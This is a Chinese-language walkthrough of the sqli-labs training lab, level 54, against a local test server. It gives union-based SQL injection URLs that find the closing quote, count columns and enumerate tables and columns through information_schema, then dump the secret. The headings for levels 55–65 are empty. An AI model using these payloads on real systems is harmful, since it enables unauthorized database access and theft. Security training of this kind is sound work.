sqli-labs闯关笔记-less54-65- (Challenges)挑战

less54

1、判断注入点和闭合符合

http://127.0.0.1:8001/Less-54/?id=1'

http://127.0.0.1:8001/Less-54/?id=1'  and 1=1  --+

2、查有多少字段

http://127.0.0.1:8001/Less-54/?id=1'  order by 3  --+

3、查看哪些字段可以回显

http://127.0.0.1:8001/Less-54/?id=-1'  union select 1,2,3  --+

4、查数据库名，获取数据库名为：challenges

http://127.0.0.1:8001/Less-54/?id=-1' union select 1,2,database()  --+

 

5、查表，获取表名为：5boynvoal3

http://127.0.0.1:8001/Less-54/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema =0x6368616c6c656e676573   --+

 

 6、查字段，获取字段为：Your Password:id,sessid,secret_3AFM,tryy

http://127.0.0.1:8001/Less-54/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x35626f796e766f616c33--+

查字段的值，获取字段的值为：Your Password:1~c9042f60f512e92f5ebfcbf053900723~vgwKsCfV0UbmWKjtdGa6C45X~6

http://127.0.0.1:8001/Less-54/?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_3AFM,tryy)) from challenges.5boynvoal3--+

提交获取的password（vgwKsCfV0UbmWKjtdGa6C45X），闯关完成。

闯关成功提示如下：

less55

less56

less57

less58

less59

less60

less61

less62

less63

less64

less65